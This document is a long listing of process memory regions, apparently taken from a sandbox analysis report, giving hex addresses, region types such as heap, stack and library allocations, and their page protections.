||
201046DE000
|
heap
|
page read and write
|
||
1D587340000
|
trusted library allocation
|
page read and write
|
||
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
201046CE000
|
heap
|
page read and write
|
||
1EE7BCD8000
|
heap
|
page read and write
|
||
199EC750000
|
heap
|
page read and write
|
||
214BDF2A000
|
trusted library allocation
|
page read and write
|
||
14E647E000
|
stack
|
page read and write
|
||
1526941C000
|
heap
|
page read and write
|
||
756B1D9000
|
stack
|
page read and write
|
||
BFD7CFE000
|
stack
|
page read and write
|
||
1524F720000
|
heap
|
page read and write
|
||
19E82DA0000
|
heap
|
page read and write
|
||
1D583B55000
|
heap
|
page read and write
|
||
199EA769000
|
heap
|
page read and write
|
||
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
7FFD34931000
|
trusted library allocation
|
page read and write
|
||
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
199EA640000
|
heap
|
page read and write
|
||
7FFD34826000
|
trusted library allocation
|
page read and write
|
||
20104920000
|
heap
|
page read and write
|
||
26617591000
|
trusted library allocation
|
page read and write
|
||
19E82E3D000
|
heap
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
1F0C41D0000
|
heap
|
page read and write
|
||
1524F4E7000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
11009FA000
|
stack
|
page read and write
|
||
14BB9FE000
|
stack
|
page read and write
|
||
152513D3000
|
heap
|
page read and write
|
||
11007FE000
|
stack
|
page read and write
|
||
1524F4C0000
|
heap
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
26618B9E000
|
trusted library allocation
|
page read and write
|
||
1D583B4F000
|
heap
|
page read and write
|
||
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
19E82E0E000
|
heap
|
page read and write
|
||
1EE7BD04000
|
heap
|
page read and write
|
||
AB4418E000
|
stack
|
page read and write
|
||
AB435BE000
|
stack
|
page read and write
|
||
1998189C000
|
trusted library allocation
|
page read and write
|
||
27145DB0000
|
heap
|
page read and write
|
||
7FFD3479B000
|
trusted library allocation
|
page read and write
|
||
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
201046F2000
|
heap
|
page read and write
|
||
19E82DEF000
|
heap
|
page read and write
|
||
7FFD3478D000
|
trusted library allocation
|
page execute and read and write
|
||
1EE7BC30000
|
heap
|
page read and write
|
||
1D583B5E000
|
heap
|
page read and write
|
||
20107F00000
|
heap
|
page read and write
|
||
14E59EE000
|
stack
|
page read and write
|
||
214BDF16000
|
trusted library allocation
|
page read and write
|
||
1524F480000
|
heap
|
page read and write
|
||
199ECADF000
|
heap
|
page read and write
|
||
214D4FC0000
|
heap
|
page read and write
|
||
199EA793000
|
heap
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
AB4317D000
|
stack
|
page read and write
|
||
14E5EFE000
|
stack
|
page read and write
|
||
199803F0000
|
trusted library allocation
|
page read and write
|
||
1525163C000
|
trusted library allocation
|
page read and write
|
||
19E82E33000
|
heap
|
page read and write
|
||
20104706000
|
heap
|
page read and write
|
||
1D583B5E000
|
heap
|
page read and write
|
||
152529EA000
|
trusted library allocation
|
page read and write
|
||
19990001000
|
trusted library allocation
|
page read and write
|
||
26615450000
|
heap
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
756B7FF000
|
stack
|
page read and write
|
||
14E6FCE000
|
stack
|
page read and write
|
||
796CC3B000
|
stack
|
page read and write
|
||
20281BCC000
|
heap
|
page read and write
|
||
271460F0000
|
heap
|
page read and write
|
||
15253032000
|
trusted library allocation
|
page read and write
|
||
7FFD34774000
|
trusted library allocation
|
page read and write
|
||
1524F6E3000
|
trusted library allocation
|
page read and write
|
||
15251380000
|
heap
|
page read and write
|
||
1524F544000
|
heap
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
15252752000
|
trusted library allocation
|
page read and write
|
||
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
201046C0000
|
heap
|
page read and write
|
||
7FFD3484C000
|
trusted library allocation
|
page execute and read and write
|
||
CA9DA7E000
|
unkown
|
page read and write
|
||
796C939000
|
stack
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
110198E000
|
stack
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
7FFD34972000
|
trusted library allocation
|
page read and write
|
||
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
199EC1A0000
|
heap
|
page read and write
|
||
AB4424F000
|
stack
|
page read and write
|
||
1D587220000
|
heap
|
page read and write
|
||
214D4C1C000
|
heap
|
page read and write
|
||
2C686090000
|
heap
|
page read and write
|
||
796D74F000
|
stack
|
page read and write
|
||
1EE7BEE0000
|
heap
|
page read and write
|
||
BFD81FE000
|
stack
|
page read and write
|
||
1524F6E0000
|
trusted library allocation
|
page read and write
|
||
1D583B62000
|
heap
|
page read and write
|
||
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
19E848B4000
|
heap
|
page read and write
|
||
796C8BE000
|
stack
|
page read and write
|
||
15251382000
|
heap
|
page read and write
|
||
201046AA000
|
heap
|
page read and write
|
||
2662F760000
|
heap
|
page read and write
|
||
201046AC000
|
heap
|
page read and write
|
||
19E82E3D000
|
heap
|
page read and write
|
||
7FFD34952000
|
trusted library allocation
|
page read and write
|
||
199EC9B0000
|
heap
|
page read and write
|
||
201046DE000
|
heap
|
page read and write
|
||
15252C8B000
|
trusted library allocation
|
page read and write
|
||
1D585534000
|
heap
|
page read and write
|
||
B5F057F000
|
stack
|
page read and write
|
||
19981C71000
|
trusted library allocation
|
page read and write
|
||
14E5DFE000
|
stack
|
page read and write
|
||
15252A16000
|
trusted library allocation
|
page read and write
|
||
19E82E0C000
|
heap
|
page read and write
|
||
1D583B71000
|
heap
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
199EC590000
|
heap
|
page readonly
|
||
7FFD34856000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
26618DE1000
|
trusted library allocation
|
page read and write
|
||
1524F620000
|
trusted library allocation
|
page read and write
|
||
199EA71A000
|
heap
|
page read and write
|
||
19E82E33000
|
heap
|
page read and write
|
||
214BDF65000
|
trusted library allocation
|
page read and write
|
||
1D583B0B000
|
heap
|
page read and write
|
||
199818C7000
|
trusted library allocation
|
page read and write
|
||
19E82DE2000
|
heap
|
page read and write
|
||
26618795000
|
trusted library allocation
|
page read and write
|
||
7FFD34846000
|
trusted library allocation
|
page read and write
|
||
199EA7D1000
|
heap
|
page read and write
|
||
E0B4BFE000
|
stack
|
page read and write
|
||
19E866A0000
|
heap
|
page read and write
|
||
266172B0000
|
heap
|
page read and write
|
||
15252A12000
|
trusted library allocation
|
page read and write
|
||
19E82E1E000
|
heap
|
page read and write
|
||
110178F000
|
stack
|
page read and write
|
||
214D4BD9000
|
heap
|
page read and write
|
||
152696B0000
|
heap
|
page execute and read and write
|
||
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
19981BA7000
|
trusted library allocation
|
page read and write
|
||
199EC834000
|
heap
|
page read and write
|
||
2010470B000
|
heap
|
page read and write
|
||
756BAFE000
|
stack
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
199EA75B000
|
heap
|
page read and write
|
||
7FFD34921000
|
trusted library allocation
|
page read and write
|
||
201046AC000
|
heap
|
page read and write
|
||
1525130C000
|
heap
|
page read and write
|
||
15251400000
|
heap
|
page read and write
|
||
1EE7BCD8000
|
heap
|
page read and write
|
||
796C473000
|
stack
|
page read and write
|
||
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
26618B64000
|
trusted library allocation
|
page read and write
|
||
796C6FE000
|
stack
|
page read and write
|
||
152696C8000
|
heap
|
page read and write
|
||
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
19E82DDD000
|
heap
|
page read and write
|
||
199EC78B000
|
heap
|
page read and write
|
||
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
199EA789000
|
heap
|
page read and write
|
||
2339B7E000
|
stack
|
page read and write
|
||
214BE2E8000
|
trusted library allocation
|
page read and write
|
||
214BCB4B000
|
trusted library allocation
|
page read and write
|
||
BFD80FE000
|
stack
|
page read and write
|
||
199EA6E0000
|
heap
|
page read and write
|
||
796D8CB000
|
stack
|
page read and write
|
||
276752F0000
|
heap
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
19E82FD0000
|
heap
|
page read and write
|
||
202819D0000
|
heap
|
page read and write
|
||
2C685DD8000
|
heap
|
page read and write
|
||
202819F5000
|
heap
|
page read and write
|
||
201046D2000
|
heap
|
page read and write
|
||
20106508000
|
heap
|
page read and write
|
||
214BDEFA000
|
trusted library allocation
|
page read and write
|
||
7FFD3477D000
|
trusted library allocation
|
page execute and read and write
|
||
15B115F0000
|
heap
|
page read and write
|
||
214D496F000
|
heap
|
page read and write
|
||
26618B8F000
|
trusted library allocation
|
page read and write
|
||
796CB3E000
|
stack
|
page read and write
|
||
2FD4EFE000
|
stack
|
page read and write
|
||
1EE7BD04000
|
heap
|
page read and write
|
||
214BAB45000
|
heap
|
page read and write
|
||
7FFD34793000
|
trusted library allocation
|
page execute and read and write
|
||
796C9B8000
|
stack
|
page read and write
|
||
266275FE000
|
trusted library allocation
|
page read and write
|
||
214BA878000
|
heap
|
page read and write
|
||
1526975D000
|
heap
|
page read and write
|
||
7FFD34A3D000
|
trusted library allocation
|
page read and write
|
||
1100282000
|
stack
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page execute and read and write
|
||
E0B53FB000
|
stack
|
page read and write
|
||
14BBDFF000
|
stack
|
page read and write
|
||
7FFD34826000
|
trusted library allocation
|
page read and write
|
||
20104610000
|
heap
|
page read and write
|
||
201046A2000
|
heap
|
page read and write
|
||
26618E0D000
|
trusted library allocation
|
page read and write
|
||
796C4FE000
|
stack
|
page read and write
|
||
15B0F980000
|
heap
|
page read and write
|
||
2FD4DFE000
|
stack
|
page read and write
|
||
1F0C40B0000
|
heap
|
page read and write
|
||
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
19E82E1D000
|
heap
|
page read and write
|
||
201046AA000
|
heap
|
page read and write
|
||
27675370000
|
heap
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
1D583B5E000
|
heap
|
page read and write
|
||
26615495000
|
heap
|
page read and write
|
||
26618E67000
|
trusted library allocation
|
page read and write
|
||
19981711000
|
trusted library allocation
|
page read and write
|
||
20281A17000
|
heap
|
page read and write
|
||
1D583B68000
|
heap
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page execute and read and write
|
||
19E82DC0000
|
heap
|
page read and write
|
||
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34792000
|
trusted library allocation
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
266172FA000
|
heap
|
page read and write
|
||
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
15252A57000
|
trusted library allocation
|
page read and write
|
||
7FFD34773000
|
trusted library allocation
|
page execute and read and write
|
||
202819FB000
|
heap
|
page read and write
|
||
2010470C000
|
heap
|
page read and write
|
||
7FFD34772000
|
trusted library allocation
|
page read and write
|
||
7FFD34783000
|
trusted library allocation
|
page execute and read and write
|
||
214BA8BC000
|
heap
|
page read and write
|
||
756B8FF000
|
stack
|
page read and write
|
||
1D583B4F000
|
heap
|
page read and write
|
||
7FFD347AB000
|
trusted library allocation
|
page read and write
|
||
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
201046CD000
|
heap
|
page read and write
|
||
20281970000
|
heap
|
page read and write
|
||
AB4410E000
|
stack
|
page read and write
|
||
201046DD000
|
heap
|
page read and write
|
||
19981248000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
214D4949000
|
heap
|
page read and write
|
||
7FFD34962000
|
trusted library allocation
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page execute and read and write
|
||
1D583B2D000
|
heap
|
page read and write
|
||
201046FC000
|
heap
|
page read and write
|
||
E0B51FE000
|
stack
|
page read and write
|
||
19E82E1F000
|
heap
|
page read and write
|
||
20104701000
|
heap
|
page read and write
|
||
20281A02000
|
heap
|
page read and write
|
||
9846DDB000
|
stack
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
B788B19000
|
stack
|
page read and write
|
||
7FFD34856000
|
trusted library allocation
|
page execute and read and write
|
||
19E82E33000
|
heap
|
page read and write
|
||
1D583B63000
|
heap
|
page read and write
|
||
19E82E47000
|
heap
|
page read and write
|
||
1D583B4F000
|
heap
|
page read and write
|
||
7FFD34940000
|
trusted library allocation
|
page execute and read and write
|
||
2662F750000
|
heap
|
page read and write
|
||
15B0FA19000
|
heap
|
page read and write
|
||
1D585888000
|
heap
|
page read and write
|
||
15B0F9FE000
|
heap
|
page read and write
|
||
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
26627741000
|
trusted library allocation
|
page read and write
|
||
1F0C3FC0000
|
heap
|
page read and write
|
||
1EE7BEED000
|
heap
|
page read and write
|
||
7FFD34782000
|
trusted library allocation
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
1D583B1E000
|
heap
|
page read and write
|
||
15261411000
|
trusted library allocation
|
page read and write
|
||
201046B5000
|
heap
|
page read and write
|
||
26616F00000
|
heap
|
page execute and read and write
|
||
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
1100C7C000
|
stack
|
page read and write
|
||
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
214D4BD5000
|
heap
|
page read and write
|
||
276751F0000
|
heap
|
page read and write
|
||
26615550000
|
heap
|
page readonly
|
||
202819CA000
|
heap
|
page read and write
|
||
19E82E33000
|
heap
|
page read and write
|
||
26617470000
|
heap
|
page read and write
|
||
214BA830000
|
heap
|
page read and write
|
||
201046D2000
|
heap
|
page read and write
|
||
202819F8000
|
heap
|
page read and write
|
||
15B0FC50000
|
heap
|
page read and write
|
||
199EC7C8000
|
heap
|
page read and write
|
||
214BC320000
|
trusted library allocation
|
page read and write
|
||
2FD4FFD000
|
stack
|
page read and write
|
||
266152A0000
|
heap
|
page read and write
|
||
15B0F9B3000
|
heap
|
page read and write
|
||
214BE1A0000
|
trusted library allocation
|
page read and write
|
||
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34952000
|
trusted library allocation
|
page read and write
|
||
2661549B000
|
heap
|
page read and write
|
||
1100A79000
|
stack
|
page read and write
|
||
15252F68000
|
trusted library allocation
|
page read and write
|
||
19E82DF6000
|
heap
|
page read and write
|
||
11008F8000
|
stack
|
page read and write
|
||
15B0F960000
|
heap
|
page read and write
|
||
152512F0000
|
heap
|
page execute and read and write
|
||
14E5C75000
|
stack
|
page read and write
|
||
214D499A000
|
heap
|
page read and write
|
||
14E607F000
|
stack
|
page read and write
|
||
14BC3FB000
|
stack
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
1524F51D000
|
heap
|
page read and write
|
||
19E82E1B000
|
heap
|
page read and write
|
||
14E637E000
|
stack
|
page read and write
|
||
15252CE7000
|
trusted library allocation
|
page read and write
|
||
214BDF28000
|
trusted library allocation
|
page read and write
|
||
26615477000
|
heap
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
796D70D000
|
stack
|
page read and write
|
||
1D583B4F000
|
heap
|
page read and write
|
||
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
26627591000
|
trusted library allocation
|
page read and write
|
||
214BC425000
|
heap
|
page read and write
|
||
1524F501000
|
heap
|
page read and write
|
||
26616F15000
|
heap
|
page read and write
|
||
202819D6000
|
heap
|
page read and write
|
||
201046DE000
|
heap
|
page read and write
|
||
1D585530000
|
heap
|
page read and write
|
||
2662760B000
|
trusted library allocation
|
page read and write
|
||
19980DF0000
|
trusted library allocation
|
page read and write
|
||
152696B6000
|
heap
|
page execute and read and write
|
||
20281870000
|
heap
|
page read and write
|
||
19E82E33000
|
heap
|
page read and write
|
||
14E5E7D000
|
stack
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
19E82DFE000
|
heap
|
page read and write
|
||
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
1D583B55000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
1D585880000
|
heap
|
page read and write
|
||
214BAAC0000
|
trusted library allocation
|
page read and write
|
||
1D583B3E000
|
heap
|
page read and write
|
||
1EE7BC8B000
|
heap
|
page read and write
|
||
19E82F90000
|
heap
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
1EE7BCCB000
|
heap
|
page read and write
|
||
1D583B5E000
|
heap
|
page read and write
|
||
214BAAD0000
|
heap
|
page readonly
|
||
20281A17000
|
heap
|
page read and write
|
||
110038E000
|
stack
|
page read and write
|
||
756B9FF000
|
stack
|
page read and write
|
||
19E82E4D000
|
heap
|
page read and write
|
||
152615C2000
|
trusted library allocation
|
page read and write
|
||
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
796CBBB000
|
stack
|
page read and write
|
||
1D583B15000
|
heap
|
page read and write
|
||
110164E000
|
stack
|
page read and write
|
||
19E82E1A000
|
heap
|
page read and write
|
||
1F0C4290000
|
heap
|
page read and write
|
||
7FFD34830000
|
trusted library allocation
|
page execute and read and write
|
||
26616DBB000
|
heap
|
page read and write
|
||
214BA8CE000
|
heap
|
page read and write
|
||
199EA7D5000
|
heap
|
page read and write
|
||
1EE7BCD8000
|
heap
|
page read and write
|
||
7FFD349A4000
|
trusted library allocation
|
page read and write
|
||
201046F2000
|
heap
|
page read and write
|
||
20281B70000
|
heap
|
page read and write
|
||
20104630000
|
heap
|
page read and write
|
||
1D583B55000
|
heap
|
page read and write
|
||
1D583AC0000
|
heap
|
page read and write
|
||
E0B4FFE000
|
stack
|
page read and write
|
||
1D583B3E000
|
heap
|
page read and write
|
||
1526147F000
|
trusted library allocation
|
page read and write
|
||
1524F640000
|
trusted library allocation
|
page read and write
|
||
1D583AE0000
|
heap
|
page read and write
|
||
201046F2000
|
heap
|
page read and write
|
||
1EE7BE30000
|
heap
|
page read and write
|
||
214BDEF6000
|
trusted library allocation
|
page read and write
|
||
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
19E82DFF000
|
heap
|
page read and write
|
||
7FFD3479D000
|
trusted library allocation
|
page execute and read and write
|
||
15B0FA09000
|
heap
|
page read and write
|
||
1D583B6E000
|
heap
|
page read and write
|
||
201046FC000
|
heap
|
page read and write
|
||
201046D9000
|
heap
|
page read and write
|
||
1D583B5E000
|
heap
|
page read and write
|
||
214BA8B0000
|
heap
|
page read and write
|
||
201046AC000
|
heap
|
page read and write
|
||
1100B7E000
|
stack
|
page read and write
|
||
14BC0FE000
|
stack
|
page read and write
|
||
7FFD34A31000
|
trusted library allocation
|
page read and write
|
||
152529E6000
|
trusted library allocation
|
page read and write
|
||
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
214BC323000
|
trusted library allocation
|
page read and write
|
||
15B114F0000
|
heap
|
page read and write
|
||
756B5FF000
|
stack
|
page read and write
|
||
214BC777000
|
heap
|
page read and write
|
||
2010472A000
|
heap
|
page read and write
|
||
19981C6D000
|
trusted library allocation
|
page read and write
|
||
20104705000
|
heap
|
page read and write
|
||
15251411000
|
trusted library allocation
|
page read and write
|
||
19E82E3D000
|
heap
|
page read and write
|
||
201046F2000
|
heap
|
page read and write
|
||
19E82DF6000
|
heap
|
page read and write
|
||
20281A0A000
|
heap
|
page read and write
|
||
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
214BA8FA000
|
heap
|
page read and write
|
||
1EE7BD04000
|
heap
|
page read and write
|
||
B7894FE000
|
stack
|
page read and write
|
||
2FD52FB000
|
stack
|
page read and write
|
||
26615600000
|
heap
|
page read and write
|
||
E0B4EFF000
|
stack
|
page read and write
|
||
214BDF24000
|
trusted library allocation
|
page read and write
|
||
20104925000
|
heap
|
page read and write
|
||
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
26617580000
|
heap
|
page execute and read and write
|
||
AB42D52000
|
stack
|
page read and write
|
||
214D4C30000
|
heap
|
page read and write
|
||
1EE7BCAE000
|
heap
|
page read and write
|
||
20104700000
|
heap
|
page read and write
|
||
984707E000
|
unkown
|
page read and write
|
||
27675397000
|
heap
|
page read and write
|
||
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
14BB8FA000
|
stack
|
page read and write
|
||
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
214CC931000
|
trusted library allocation
|
page read and write
|
||
199816FC000
|
trusted library allocation
|
page read and write
|
||
796D60E000
|
stack
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
2FD49FE000
|
stack
|
page read and write
|
||
15B0FA19000
|
heap
|
page read and write
|
||
20281BC5000
|
heap
|
page read and write
|
||
26615440000
|
trusted library allocation
|
page read and write
|
||
199EA7A7000
|
heap
|
page read and write
|
||
1D583900000
|
heap
|
page read and write
|
||
214BE174000
|
trusted library allocation
|
page read and write
|
||
214BDF36000
|
trusted library allocation
|
page read and write
|
||
1D583B4F000
|
heap
|
page read and write
|
||
1524F6A0000
|
heap
|
page read and write
|
||
20281A01000
|
heap
|
page read and write
|
||
19E848B0000
|
heap
|
page read and write
|
||
15251484000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
1D583B8C000
|
heap
|
page read and write
|
||
20104704000
|
heap
|
page read and write
|
||
7FFD34921000
|
trusted library allocation
|
page read and write
|
||
214BE1FA000
|
trusted library allocation
|
page read and write
|
||
202837A0000
|
heap
|
page read and write
|
||
796CA3E000
|
stack
|
page read and write
|
||
201046AC000
|
heap
|
page read and write
|
||
14E6F4F000
|
stack
|
page read and write
|
||
2FD48FD000
|
stack
|
page read and write
|
||
14E657B000
|
stack
|
page read and write
|
||
19981922000
|
trusted library allocation
|
page read and write
|
||
110067E000
|
stack
|
page read and write
|
||
27145D50000
|
heap
|
page read and write
|
||
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
14E62FE000
|
stack
|
page read and write
|
||
1D583B55000
|
heap
|
page read and write
|
||
15B0F9F9000
|
heap
|
page read and write
|
||
14E63FE000
|
stack
|
page read and write
|
||
19E84C40000
|
heap
|
page read and write
|
||
199EC890000
|
heap
|
page execute and read and write
|
||
796CABE000
|
stack
|
page read and write
|
||
199EC170000
|
heap
|
page read and write
|
||
266153A0000
|
heap
|
page read and write
|
||
1524F4A0000
|
heap
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
214BAB40000
|
heap
|
page read and write
|
||
1524F4FF000
|
heap
|
page read and write
|
||
214CCACA000
|
trusted library allocation
|
page read and write
|
||
201046FC000
|
heap
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
214BC910000
|
heap
|
page execute and read and write
|
||
266177BD000
|
trusted library allocation
|
page read and write
|
||
214D4920000
|
heap
|
page read and write
|
||
E0B4AFE000
|
stack
|
page read and write
|
||
15B0FA0A000
|
heap
|
page read and write
|
||
19981650000
|
trusted library allocation
|
page read and write
|
||
199EC140000
|
trusted library allocation
|
page read and write
|
||
19E84C48000
|
heap
|
page read and write
|
||
201046F2000
|
heap
|
page read and write
|
||
27145D80000
|
heap
|
page read and write
|
||
7FFD34941000
|
trusted library allocation
|
page read and write
|
||
214CC921000
|
trusted library allocation
|
page read and write
|
||
266155D0000
|
trusted library allocation
|
page read and write
|
||
AB431FF000
|
stack
|
page read and write
|
||
19E82E19000
|
heap
|
page read and write
|
||
1EE7BCC2000
|
heap
|
page read and write
|
||
1D583B5E000
|
heap
|
page read and write
|
||
19E82E3D000
|
heap
|
page read and write
|
||
110087E000
|
stack
|
page read and write
|
||
7FFD34836000
|
trusted library allocation
|
page read and write
|
||
1999006E000
|
trusted library allocation
|
page read and write
|
||
214D4AC6000
|
heap
|
page execute and read and write
|
||
11016CE000
|
stack
|
page read and write
|
||
110180F000
|
stack
|
page read and write
|
||
14BC1FD000
|
stack
|
page read and write
|
||
214D4C2D000
|
heap
|
page read and write
|
||
266154D7000
|
heap
|
page read and write
|
||
796C7FE000
|
stack
|
page read and write
|
||
1D583B16000
|
heap
|
page read and write
|
||
7FFD3478B000
|
trusted library allocation
|
page read and write
|
||
214D4BEC000
|
heap
|
page read and write
|
||
214BC921000
|
trusted library allocation
|
page read and write
|
||
19E82DEB000
|
heap
|
page read and write
|
||
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
214BDF2F000
|
trusted library allocation
|
page read and write
|
||
7FFD34774000
|
trusted library allocation
|
page read and write
|
||
AB4327E000
|
stack
|
page read and write
|
||
AB442CF000
|
stack
|
page read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
AB436BB000
|
stack
|
page read and write
|
||
796D68E000
|
stack
|
page read and write
|
||
14E60FD000
|
stack
|
page read and write
|
||
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
201046AA000
|
heap
|
page read and write
|
||
7FFD3494A000
|
trusted library allocation
|
page read and write
|
||
11003CE000
|
stack
|
page read and write
|
||
214CC987000
|
trusted library allocation
|
page read and write
|
||
199EC970000
|
heap
|
page execute and read and write
|
||
1525135D000
|
heap
|
page read and write
|
||
1F0C40D4000
|
heap
|
page read and write
|
||
199ECADC000
|
heap
|
page read and write
|
||
199ECAEB000
|
heap
|
page read and write
|
||
152699C0000
|
heap
|
page read and write
|
||
266154DB000
|
heap
|
page read and write
|
||
202819D6000
|
heap
|
page read and write
|
||
201046CC000
|
heap
|
page read and write
|
||
14E5F7B000
|
stack
|
page read and write
|
||
214BE47B000
|
trusted library allocation
|
page read and write
|
||
2C685DD0000
|
heap
|
page read and write
|
||
1525302E000
|
trusted library allocation
|
page read and write
|
||
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
2662F774000
|
heap
|
page read and write
|
||
1D583B4F000
|
heap
|
page read and write
|
||
1D583B6D000
|
heap
|
page read and write
|
||
1526148B000
|
trusted library allocation
|
page read and write
|
||
15B0F9CB000
|
heap
|
page read and write
|
||
201046FC000
|
heap
|
page read and write
|
||
2C685D80000
|
heap
|
page read and write
|
||
1D583B2F000
|
heap
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
19E82E0E000
|
heap
|
page read and write
|
||
15B0FA19000
|
heap
|
page read and write
|
||
2FD51FF000
|
stack
|
page read and write
|
||
199EC5D0000
|
trusted library allocation
|
page read and write
|
||
214BD54B000
|
trusted library allocation
|
page read and write
|
||
19E82E50000
|
heap
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
14BBCFE000
|
stack
|
page read and write
|
||
15B0F9CC000
|
heap
|
page read and write
|
||
14E5FFF000
|
stack
|
page read and write
|
||
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
201046F2000
|
heap
|
page read and write
|
||
1EE7BC20000
|
heap
|
page read and write
|
||
1524F549000
|
heap
|
page read and write
|
||
1524F4C8000
|
heap
|
page read and write
|
There are 933 hidden memdumps, click here to show them.